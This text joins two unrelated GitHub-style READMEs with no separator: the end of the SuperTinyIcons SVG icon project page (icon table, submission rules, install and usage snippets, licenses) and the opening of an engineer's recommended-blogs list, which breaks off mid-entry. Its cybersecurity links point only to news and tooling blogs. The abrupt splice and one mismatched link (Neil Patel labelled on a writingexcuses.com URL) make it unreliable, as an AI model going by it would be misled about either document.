src="https://edent.github.io/SuperTinyIcons/images/svg/opera.svg" width="100" title="Opera"><br>300 bytes</td> <td>Orcid<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/orcid.svg" width="100" title="Orcid"><br>317 bytes</td> <td>Origin<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/origin.svg" width="100" title="Origin"><br>644 bytes</td> </tr> <tr> <td>Outlook<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/outlook.svg" width="100" title="Outlook"><br>886 bytes</td> <td>Overcast<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/overcast.svg" width="100" title="Overcast"><br>780 bytes</td> <td>Overleaf<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/overleaf.svg" width="100" title="Overleaf"><br>443 bytes</td> <td>Patreon<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/patreon.svg" width="100" title="Patreon"><br>211 bytes</td> <td>PayPal<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/paypal.svg" width="100" title="PayPal"><br>508 bytes</td> <td>PDF<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/pdf.svg" width="100" title="PDF"><br>665 bytes</td> </tr> <tr> <td>Phone<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/phone.svg" width="100" title="Phone"><br>582 bytes</td> <td>PHP<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/php.svg" width="100" title="PHP"><br>586 bytes</td> <td>Pinboard<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/pinboard.svg" width="100" title="Pinboard"><br>249 bytes</td> <td>Pinterest<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/pinterest.svg" width="100" title="Pinterest"><br>517 bytes</td> <td>Pixelfed<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/pixelfed.svg" width="100" title="Pixelfed"><br>980 bytes</td> <td>Plex<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/plex.svg" width="100" title="Plex"><br>212 bytes</td> </tr> <tr> <td>Pocket<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/pocket.svg" width="100" title="Pocket"><br>299 bytes</td> <td>Pocket Casts<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/pocketcasts.svg" width="100" title="Pocket Casts"><br>269 bytes</td> <td>Pop!_OS<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/popos.svg" width="100" title="Pop!_OS"><br>436 bytes</td> <td>Pornhub<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/pornhub.svg" width="100" title="Pornhub"><br>829 bytes</td> <td>PowerShell<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/powershell.svg" width="100" title="PowerShell"><br>998 bytes</td> <td>Preact<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/preact.svg" width="100" title="Preact"><br>521 bytes</td> </tr> <tr> <td>Printer<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/print.svg" width="100" title="Printer"><br>441 bytes</td> <td>Proton Mail<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/protonmail.svg" width="100" title="Proton Mail"><br>635 bytes</td> <td>Python<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/python.svg" width="100" title="Python"><br>550 bytes</td> <td>QQ<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/qq.svg" width="100" title="QQ"><br>941 bytes</td> <td>quora<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/quora.svg" width="100" title="quora"><br>272 bytes</td> <td>Raspberry Pi<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/raspberry_pi.svg" width="100" title="Raspberry Pi"><br>964 bytes</td> </tr> <tr> <td>React<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/react.svg" width="100" title="React"><br>351 bytes</td> <td>Reddit<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/reddit.svg" width="100" title="Reddit"><br>598 bytes</td> <td>RedHat<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/redhat.svg" width="100" title="RedHat"><br>540 bytes</td> <td>Research Gate<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/researchgate.svg" width="100" title="Research Gate"><br>904 bytes</td> <td>Roundcube<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/roundcube.svg" width="100" title="Roundcube"><br>525 bytes</td> <td>RSS<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/rss.svg" width="100" title="RSS"><br>298 bytes</td> </tr> <tr> <td>Ruby<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ruby.svg" width="100" title="Ruby"><br>947 bytes</td> <td>Ruby Gems<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/rubygems.svg" width="100" title="Ruby Gems"><br>280 bytes</td> <td>Ruby On Rails<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/rubyonrails.svg" width="100" title="Ruby On Rails"><br>466 bytes</td> <td>Rust<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/rust.svg" width="100" title="Rust"><br>998 bytes</td> <td>Safari<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/safari.svg" width="100" title="Safari"><br>699 bytes</td> <td>Samsung<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/samsung.svg" width="100" title="Samsung"><br>863 bytes</td> </tr> <tr> <td>Samsung Internet<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/samsung_internet.svg" width="100" title="Samsung Internet"><br>337 bytes</td> <td>Samsung<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/samsung_s.svg" width="100" title="Samsung"><br>608 bytes</td> <td>Samsung<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/samsung_swoop.svg" width="100" title="Samsung"><br>884 bytes</td> <td>Sass<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/sass.svg" width="100" title="Sass"><br>519 bytes</td> <td>Semaphore CI<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/semaphoreci.svg" width="100" title="Semaphore CI"><br>463 bytes</td> <td>Sentry<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/sentry.svg" width="100" title="Sentry"><br>370 bytes</td> </tr> <tr> <td>Signal<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/signal.svg" width="100" title="Signal"><br>430 bytes</td> <td>Sketch<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/sketch.svg" width="100" title="Sketch"><br>359 bytes</td> <td>Skype<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/skype.svg" width="100" title="Skype"><br>478 bytes</td> <td>Slack<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/slack.svg" width="100" title="Slack"><br>522 bytes</td> <td>SlideShare<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/slideshare.svg" width="100" title="SlideShare"><br>652 bytes</td> <td>Snapchat<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/snapchat.svg" width="100" title="Snapchat"><br>640 bytes</td> </tr> <tr> <td>SOGo<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/sogo.svg" width="100" title="SOGo"><br>842 bytes</td> <td>Solidity<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/solidity.svg" width="100" title="Solidity"><br>554 bytes</td> <td>SoundCloud<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/soundcloud.svg" width="100" title="SoundCloud"><br>950 bytes</td> <td>Spotify<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/spotify.svg" width="100" title="Spotify"><br>424 bytes</td> <td>Square Cash<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/square_cash.svg" width="100" title="Square Cash"><br>782 bytes</td> <td>Stack Exchange<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/stackexchange.svg" width="100" title="Stack Exchange"><br>398 bytes</td> </tr> <tr> <td>Stack Overflow<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/stackoverflow.svg" width="100" title="Stack Overflow"><br>294 bytes</td> <td>Steam<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/steam.svg" width="100" title="Steam"><br>446 bytes</td> <td>Stitcher<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/stitcher.svg" width="100" title="Stitcher"><br>378 bytes</td> <td>Strava<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/strava.svg" width="100" title="Strava"><br>277 bytes</td> <td>StumbleUpon<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/stumbleupon.svg" width="100" title="StumbleUpon"><br>350 bytes</td> <td>Sublime Merge<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/sublimemerge.svg" width="100" title="Sublime Merge"><br>557 bytes</td> </tr> <tr> <td>Sublime Text<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/sublimetext.svg" width="100" title="Sublime Text"><br>595 bytes</td> <td>SubscribeStar<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/subscribestar.svg" width="100" title="SubscribeStar"><br>590 bytes</td> <td>Svelte<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/svelte.svg" width="100" title="Svelte"><br>477 bytes</td> <td>SVG<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/svg.svg" width="100" title="SVG"><br>755 bytes</td> <td>Symantec<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/symantec.svg" width="100" title="Symantec"><br>605 bytes</td> <td>Symfony<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/symfony.svg" width="100" title="Symfony"><br>615 bytes</td> </tr> <tr> <td>taiga.io<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/taiga.svg" width="100" title="taiga.io"><br>742 bytes</td> <td>Teamspeak<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/teamspeak.svg" width="100" title="Teamspeak"><br>927 bytes</td> <td>Telegram<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/telegram.svg" width="100" title="Telegram"><br>410 bytes</td> <td>Terraform<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/terraform.svg" width="100" title="Terraform"><br>294 bytes</td> <td>This American Life<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/thisamericanlife.svg" width="100" title="This American Life"><br>293 bytes</td> <td>Threads<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/threads.svg" width="100" title="Threads"><br>371 bytes</td> </tr> <tr> <td>Threema<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/threema.svg" width="100" title="Threema"><br>387 bytes</td> <td>TikTok<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/tiktok.svg" width="100" title="TikTok"><br>398 bytes</td> <td>Todoist<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/todoist.svg" width="100" title="Todoist"><br>761 bytes</td> <td>Tox<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/tox.svg" width="100" title="Tox"><br>486 bytes</td> <td>Trello<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/trello.svg" width="100" title="Trello"><br>267 bytes</td> <td>TripAdvisor<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/tripadvisor.svg" width="100" title="TripAdvisor"><br>703 bytes</td> </tr> <tr> <td>Tumblr<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/tumblr.svg" width="100" title="Tumblr"><br>257 bytes</td> <td>TuneIn<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/tunein.svg" width="100" title="TuneIn"><br>599 bytes</td> <td>Tutanota<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/tutanota.svg" width="100" title="Tutanota"><br>567 bytes</td> <td>Twilio<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/twilio.svg" width="100" title="Twilio"><br>317 bytes</td> <td>Twitch<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/twitch.svg" width="100" title="Twitch"><br>277 bytes</td> <td>Twitter<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/twitter.svg" width="100" title="Twitter"><br>358 bytes</td> </tr> <tr> <td>TypeScript<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/typescript.svg" width="100" title="TypeScript"><br>609 bytes</td> <td>Uber<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/uber.svg" width="100" title="Uber"><br>602 bytes</td> <td>Ubiquiti<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ubiquiti.svg" width="100" title="Ubiquiti"><br>549 bytes</td> <td>Ubisoft<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ubisoft.svg" width="100" title="Ubisoft"><br>520 bytes</td> <td>Ubuntu<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/ubuntu.svg" width="100" title="Ubuntu"><br>446 bytes</td> <td>Udemy<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/udemy.svg" width="100" title="Udemy"><br>297 bytes</td> </tr> <tr> <td>Unicode<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/unicode.svg" width="100" title="Unicode"><br>603 bytes</td> <td>Untappd<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/untappd.svg" width="100" title="Untappd"><br>401 bytes</td> <td>Uphold<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/uphold.svg" width="100" title="Uphold"><br>810 bytes</td> <td>Uplay<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/uplay.svg" width="100" title="Uplay"><br>533 bytes</td> <td>Upwork<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/upwork.svg" width="100" title="Upwork"><br>495 bytes</td> <td>Vagrant<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/vagrant.svg" width="100" title="Vagrant"><br>544 bytes</td> </tr> <tr> <td>Vegetarian<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/vegetarian.svg" width="100" title="Vegetarian"><br>291 bytes</td> <td>Venmo<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/venmo.svg" width="100" title="Venmo"><br>278 bytes</td> <td>Viber<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/viber.svg" width="100" title="Viber"><br>704 bytes</td> <td>Vim<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/vim.svg" width="100" title="Vim"><br>770 bytes</td> <td>Vimeo<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/vimeo.svg" width="100" title="Vimeo"><br>342 bytes</td> <td>Visual Studio Code<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/visualstudiocode.svg" width="100" title="Visual Studio Code"><br>914 bytes</td> </tr> <tr> <td>Vivino<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/vivino.svg" width="100" title="Vivino"><br>285 bytes</td> <td>VK<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/vk.svg" width="100" title="VK"><br>525 bytes</td> <td>VLC<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/vlc.svg" width="100" title="VLC"><br>661 bytes</td> <td>Vue<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/vue.svg" width="100" title="Vue"><br>263 bytes</td> <td>W3C<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/w3c.svg" width="100" title="W3C"><br>529 bytes</td> <td>WebAssembly<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/webassembly.svg" width="100" title="WebAssembly"><br>489 bytes</td> </tr> <tr> <td>WebMention<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/webmention.svg" width="100" title="WebMention"><br>267 bytes</td> <td>WeChat<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/wechat.svg" width="100" title="WeChat"><br>631 bytes</td> <td>Wekan<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/wekan.svg" width="100" title="Wekan"><br>972 bytes</td> <td>WhatsApp<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/whatsapp.svg" width="100" title="WhatsApp"><br>470 bytes</td> <td>WHATWG<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/whatwg.svg" width="100" title="WHATWG"><br>319 bytes</td> <td>WiFi<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/wifi.svg" width="100" title="WiFi"><br>574 bytes</td> </tr> <tr> <td>Wikipedia<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/wikipedia.svg" width="100" title="Wikipedia"><br>574 bytes</td> <td>Windows<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/windows.svg" width="100" title="Windows"><br>243 bytes</td> <td>Wire<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/wire.svg" width="100" title="Wire"><br>262 bytes</td> <td>WireGuard<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/wireguard.svg" width="100" title="WireGuard"><br>961 bytes</td> <td>WordPress<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/wordpress.svg" width="100" title="WordPress"><br>494 bytes</td> <td>Workato<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/workato.svg" width="100" title="Workato"><br>368 bytes</td> </tr> <tr> <td>XING<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/xing.svg" width="100" title="XING"><br>353 bytes</td> <td>XMPP<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/xmpp.svg" width="100" title="XMPP"><br>671 bytes</td> <td>Yahoo!<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/yahoo.svg" width="100" title="Yahoo!"><br>286 bytes</td> <td>Yammer<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/yammer.svg" width="100" title="Yammer"><br>470 bytes</td> <td>Yarn<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/yarn.svg" width="100" title="Yarn"><br>506 bytes</td> <td>Yelp<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/yelp.svg" width="100" title="Yelp"><br>454 bytes</td> </tr> <tr> <td>YouTube<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/youtube.svg" width="100" title="YouTube"><br>342 bytes</td> <td>Yubico<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/yubico.svg" width="100" title="Yubico"><br>256 bytes</td> <td>Zoom<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/zoom.svg" width="100" title="Zoom"><br>521 bytes</td> <td>Zorinos<br><img src="https://edent.github.io/SuperTinyIcons/images/svg/zorinos.svg" width="100" title="Zorinos"><br>260 bytes</td> </tr> </table> ## Why so smallious? Bytes cost money. They cost money to store, transport, and process. Simplicity should be our goal in all endeavours. ## Scream if you want to go smaller These files were edited by hand in Inkscape, Illustrator, or a text editor, then were minified using [Yann Armelin's SVG Path Editor](https://yqnn.github.io/svg-path-editor/), [svgo](https://github.com/svg/svgo), and [svgcleaner](https://github.com/RazrFalcon/svgcleaner). Further smallification may be possible. Try it! - Each of these has an `xmlns="http://www.w3.org/2000/svg"` in the `<svg>` tag. This isn't strictly necessary - but some web browsers won't display them as an image without it. - The background colour can also be excluded if you're including it elsewhere. - Colours can be simplified. `#FF0000` becomes `red`. - The precision of the paths is _mostly_ 0 decimal places. A few logos have 1 or 2 dp to make them look more accurate. The precision can be reduced if necessary. Think you can make them smaller? Tell me by raising an issue! Want more icons? Tell me by raising an issue! Think the icons look wrong? [Compare them against the official logos](https://github.com/edent/SuperTinyIcons/blob/master/images/reference/index.md). If they still look wrong, tell me by raising an issue! ## Android Vector Drawables Icons also available as [Android Vector Drawables](https://developer.android.com/guide/topics/graphics/vector-drawable-resources.html), so you can easily use them in Android apps. They are **not** guaranteed to be under 1KB. ## Submitting Icons I'd _love_ you to submit something 😸 The rules are simple, your icon must: - be **under** 1024 bytes. That is, the maximum file size is 1023 bytes. No arguments. - fit inside a circle with radius 256 pixels. Set `rx="50%"` to check. - represent a popular service's current logo. ### Template At a minimum, your icon needs these components: ``` <svg xmlns="http://www.w3.org/2000/svg" aria-label="..." role="img" viewBox="0 0 512 512"> <rect width="512" height="512" fill="#fff"/> ... </svg> ``` ### Icon accessibility The super tiny icons are accessible by default. Each icon has: - `role="img"`, to expose the `<svg>` elements as images in the browser's accessibility tree - `aria-label="XYZ"` (where XYZ is the icon's brand name), to give the icon an accessible name `Note:` if using the `<svg>` as the `src` for an `<img>` element, the `alt` attribute should still be used on the `<img>` element because the ARIA is not recognised in this context. CSS-Tricks has also an [article about accessible SVG icons](https://css-tricks.com/accessible-svgs/). ### Guidelines This is the standard guideline. Use this to help with sizing your icons and they will look good no matter what border radius is chosen. <img src="https://edent.github.io/SuperTinyIcons/images/guidelines/guideline.svg" width="256" alt="A template for logos" /> - **Green** is the safe zone, where the main body of the icon should be. - **Yellow** is like a road shoulder, it is there if more space is needed. It should be used for protruding elements, like corners or ornaments. - **Red** is off limits. It should not be touched by the icons. Red is also how a circular icon would look. ## Installation ```sh npm install --save super-tiny-icons ``` ## Usage The old-school way: ```html <img src="./node_modules/super-tiny-icons/images/svg/github.svg" /> ``` The modern way, the React (JSX) example: ```jsx import logo from 'super-tiny-icons/images/svg/github.svg'; <img src={logo} />; ``` [CSS](https://developer.mozilla.org/docs/Web/CSS) can be used to customize an icon's appearance. The following example shows styles for small/medium/large icons with square/rounded/circular frames: ```html <style> .small-square { width: 20px; } .medium-rounded { width: 50px; border-radius: 10%; } .large-circular { width: 100px; border-radius: 50%; } </style> <img src="images/svg/reddit.svg" class="small-square" /> <img src="images/svg/reddit.svg" class="medium-rounded" /> <img src="images/svg/reddit.svg" class="large-circular" /> ``` ## Contributors ### Code Contributors This project exists thanks to all the people who contribute. [[Contribute](CONTRIBUTING.md)]. <a href="https://github.com/edent/SuperTinyIcons/graphs/contributors"><img src="https://opencollective.com/SuperTinyIcons/contributors.svg?width=890&button=false" /></a> ### Financial Contributors Become a financial contributor and help us sustain our community. [[Contribute](https://opencollective.com/SuperTinyIcons/contribute)] #### Individuals <a href="https://opencollective.com/SuperTinyIcons"><img src="https://opencollective.com/SuperTinyIcons/individuals.svg?width=890"></a> #### Organizations Support this project with your organization. Your logo will show up here with a link to your website. [[Contribute](https://opencollective.com/SuperTinyIcons/contribute)] <a href="https://opencollective.com/SuperTinyIcons/organization/0/website"><img src="https://opencollective.com/SuperTinyIcons/organization/0/avatar.svg"></a> <a href="https://opencollective.com/SuperTinyIcons/organization/1/website"><img src="https://opencollective.com/SuperTinyIcons/organization/1/avatar.svg"></a> <a href="https://opencollective.com/SuperTinyIcons/organization/2/website"><img src="https://opencollective.com/SuperTinyIcons/organization/2/avatar.svg"></a> <a href="https://opencollective.com/SuperTinyIcons/organization/3/website"><img src="https://opencollective.com/SuperTinyIcons/organization/3/avatar.svg"></a> <a href="https://opencollective.com/SuperTinyIcons/organization/4/website"><img src="https://opencollective.com/SuperTinyIcons/organization/4/avatar.svg"></a> <a href="https://opencollective.com/SuperTinyIcons/organization/5/website"><img src="https://opencollective.com/SuperTinyIcons/organization/5/avatar.svg"></a> <a href="https://opencollective.com/SuperTinyIcons/organization/6/website"><img src="https://opencollective.com/SuperTinyIcons/organization/6/avatar.svg"></a> <a href="https://opencollective.com/SuperTinyIcons/organization/7/website"><img src="https://opencollective.com/SuperTinyIcons/organization/7/avatar.svg"></a> <a href="https://opencollective.com/SuperTinyIcons/organization/8/website"><img src="https://opencollective.com/SuperTinyIcons/organization/8/avatar.svg"></a> <a href="https://opencollective.com/SuperTinyIcons/organization/9/website"><img src="https://opencollective.com/SuperTinyIcons/organization/9/avatar.svg"></a> ## Licenses The majority of these vector logos are based on someone else's work. - [Social Media Icons by Aha-Soft](https://www.iconfinder.com/iconsets/social-flat-rounded-rects) - CC-BY - [Phone Icon](https://www.iconfinder.com/icons/1807538/phone_icon#size=128) - Free - [Lock Icon](https://www.iconfinder.com/icons/1814107/lock_padlock_secure_icon#size=512) - MIT - [Wire Logo](https://commons.wikimedia.org/wiki/File:Wire_software_logo.svg) - Public Domain - [Signal Logo](https://github.com/WhisperSystems/Signal-iOS/blob/master/Signal/Images.xcassets/logoSignal.imageset/logoSignal.pdf) - GPLv3 - [RSS Icon](https://commons.wikimedia.org/wiki/File:Generic_Feed-icon.svg) - MPL 1.1 - [PDF Icon](https://www.iconfinder.com/iconsets/line-icons-set) - Free - [Google+](https://commons.wikimedia.org/wiki/File:Google_Plus_logo_2015.svg) - Public Domain - [Google](http://svgshare.com/s/q) - [Mastodon](https://github.com/tootsuite/mastodon/blob/0ad694f96b7f0e951950e7525bde52cd11454cb2/app/assets/images/logo.svg) - AGPLv3 - [GitLab](https://about.gitlab.com/press/) - [HTML5 Shield](https://www.w3.org/html/logo/) - CC-BY - [npm Logo](https://commons.wikimedia.org/wiki/File:Npm-logo.svg) - CC-BY - [Docker Logo](https://github.com/docker/docker.github.io/blob/master/LICENSE) - Apache - [Steam](https://commons.wikimedia.org/wiki/File:Steam_icon_logo.svg) - [Symantec](https://commons.wikimedia.org/wiki/File:Symantec_logo10.svg) - [Yubico](https://github.com/Yubico/yubikey-manager-qt/blob/master/resources/icons/ykman.png) - BSD - [Keybase](https://github.com/keybase/client/blob/master/shared/images/iconfont/kb-iconfont-keybase-16.svg) - BSD - [eBay](https://commons.wikimedia.org/wiki/File:EBay_logo.svg) - [Kickstarter](https://www.kickstarter.com/help/brand_assets) - [Bitcoin](https://commons.wikimedia.org/wiki/File:Bitcoin_logo.svg) - CC0 - [Bluetooth](https://commons.wikimedia.org/wiki/File:Bluetooth.svg) - [Blogger](https://commons.wikimedia.org/wiki/File:Blogger_icon.svg) - [Medium](https://medium.design/logos-and-brand-guidelines-f1a01a733592) - [Ghost](https://commons.wikimedia.org/wiki/File:Ghost-Logo.svg) - [Tumblr](https://www.tumblr.com/logo) - [Intel](https://commons.wikimedia.org/wiki/File:Intel-logo.svg) - [Badoo](https://team.badoo.com/new/) - [YouTube](https://www.youtube.com/yt/about/brand-resources/#logos-icons-colors) - [Google Play](https://commons.wikimedia.org/wiki/File:Google_Play_symbol_2016.svg) - [Gmail](https://commons.wikimedia.org/wiki/File:Gmail_Icon.svg) - [Samsung Internet](https://github.com/edent/SuperTinyIcons/pull/74/commits/8824bdaf1346a472ab425347f958e8e64c0948ee) - [Plex](https://github.com/plexinc/plex-media-player/blob/master/resources/images/icon.svg) - GPLv2 - [NHS](https://www.england.nhs.uk/nhsidentity/identity-guidelines/nhs-logo/) - [Threema.](https://threema.ch/de/press) - [CoreUI](https://github.com/coreui/coreui-icons) - CC-BY - [NixOS](https://github.com/NixOS/nixos-artwork) - CC-BY From [SVGporn](https://github.com/gilbarbara/logos/) - CC0 IBM, Yammer, Android, Authy, Cloudflare, CodePen, DigitalOcean, Discord, Airbnb, WiFi, Delicious, Open Source, Patreon, Tim Cuthbertson Where possible, they retain their original licenses. Some logos may be subject to copyright and trademark laws, but these files are small enough to memorise.
# Recommendations for Engineers All of my recommendations for aspiring engineers in a single place, coming from various areas of interest. The principal scope supports `data science`, `programming`, `python`, `math`, `cybersecurity`, `business`, and `productivity`. The list also aggregates and extends most of the suggestions from [my blog posts](https://pawelcislo.com/), where some of the entries come from a different language (🇵🇱). Although it's my personal list, don't hesitate to create a pull request if I missed something interesting or if there is a dead link. Inspired by the [awesome](https://github.com/sindresorhus/awesome) list thing. * * * * * ## Contents - 🌐 [Blogs](#-blogs) - 📚 [Books](#-books) - 💾 [Browser Extensions](#-browser-extensions) - 💼 [Business](#-business) - 👾 [Cybersecurity](#-cybersecurity) - 📊 [Data Science](#-data-science) - 🎨 [Design](#-design) - 📆 [Events](#-events) - 📰 [IT News](#-it-news) - 🧠 [Learning](#-learning) - 🐧 [Linux](#-linux) - 🍎 [macOS](#-macos) - ➗ [Math](#-math) - 📱 [Mobile Apps](#-mobile-apps) - 🎶 [Music](#-music) - 📧 [Newsletters](#-newsletters) - 🎧 [Podcasts](#-podcasts) - ⏲ [Productivity](#-productivity) - 👨‍💻 [Programming](#-programming) - 🛫 [Travel](#-travel) - 🖥 [Windows](#-windows) - ✍ [Writing/Research](#-writing_research) - 📼 [YouTube Channels](#-youtube-channels) - 🤷‍ [Other](#-other) * * * * * ## 🌐 Blogs It's best to collect all your favourite sites into the RSS feed reader like [Inoreader](https://inoreader.com/). You can also discover more tech blogs with [Blogging for Devs](https://bloggingfordevs.com/trends/). ### business - [Gary Vaynerchuk](https://www.garyvaynerchuk.com/blog/) ← business/motivation oriented blog - [Grant Cardone](https://grantcardone.com/blog/) ← business/motivation oriented blog - [I Will Teach You To Be Rich](https://www.iwillteachyoutoberich.com/blog/) - [Kopywriting Kourse](https://kopywritingkourse.com/blog/) ← improve your writing - [Marcin Iwuć](https://marciniwuc.com/) (🇵🇱) ← personal finances - [Neil Patel](https://writingexcuses.com/) ← digital marketing blog - [Social Media Examiner](https://www.socialmediaexaminer.com/) ← guide to social media ### cybersecurity - [Gynvael Coldwind](https://gynvael.coldwind.pl/) ← blog of a programmer enthusiast with a passion for computer security and low-level aspects of computer science - [KitPloit](https://www.kitploit.com/) ← pentest & hacking tools - [Latest Hacking News](https://latesthackingnews.com/) ← latest cybersecurity news - [LiveOverflow](https://liveoverflow.com/) ← blog of a security professional who shares free IT security videos on YouTube - [mr.d0x](https://mrd0x.com/) ← red team & security research notes - [Niebezpiecznik](https://niebezpiecznik.pl/) (🇵🇱) ← most popular Polish blog on cybersecurity - [Paged Out!](https://pagedout.institute/) ← free magazine on programming with a focus on hacking - [Security Through Education](https://www.social-engineer.org/blog/) ← blog on human engineering - [Sekurak](https://sekurak.pl/) (🇵🇱) ← for more technical profiles - [The Hacker News](https://thehackernews.com/) ← latest cybersecurity news - [Zaufana Trzecia Strona](https://zaufanatrzeciastrona.pl/) (🇵🇱) ### data science - [Analytics Vidhya](https://www.analyticsvidhya.com/blog/) ← analytics and big data - [Andrej Karpathy](https://karpathy.github.io/) ← blog of AI director at Tesla - [Becoming Human](https://becominghuman.ai/) ← exploring AI & what it means to be human - [Biznes Myśli](https://biznesmysli.pl/) (🇵🇱) ← AI in business - [Brilliantly wrong](https://arogozhnikov.github.io/) ← math, machine learning, programming, physics and biology - [Business Science](https://www.business-science.io/blog/index.html) ← general blog on DS with many courses - [Catbug88's Blog](https://pabloinsente.github.io/) ← cognitive science, social science, 